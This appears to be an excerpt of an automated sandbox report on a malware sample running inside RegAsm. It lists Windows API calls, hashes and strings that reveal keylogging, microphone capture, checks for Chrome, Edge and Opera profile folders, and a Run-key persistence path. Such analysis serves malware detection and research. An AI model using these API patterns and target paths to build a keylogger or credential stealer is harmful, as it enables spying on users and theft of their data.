                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                  • Opcode Fuzzy Hash: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                  • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: XMG
                                                  • API String ID: 2315374483-813777761
                                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$kKD
                                                  • API String ID: 1901932003-3269126172
                                                  • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                  • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                  • API String ID: 1174141254-4188645398
                                                  • Opcode ID: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                  • Opcode Fuzzy Hash: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                  • API String ID: 1174141254-2800177040
                                                  • Opcode ID: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                  • Opcode Fuzzy Hash: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                  • API String ID: 1174141254-1629609700
                                                  • Opcode ID: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                  • Opcode Fuzzy Hash: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                  • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: !D@$open
                                                  • API String ID: 587946157-1586967515
                                                  • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                  • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                  • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 1881088180-2015055088
                                                  • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                  • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                  • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                  • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                  APIs
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteDirectoryFileRemove
                                                  • String ID: pth_unenc
                                                  • API String ID: 3325800564-4028850238
                                                  • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                  • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                  • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                  • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                  APIs
                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ObjectProcessSingleTerminateWait
                                                  • String ID: pth_unenc
                                                  • API String ID: 1872346434-4028850238
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
• GetLastError.KERNEL32 ref: 00440D85
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
APIs
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
• SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
• SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorLastRead
• String ID:
• API String ID: 4100373531-0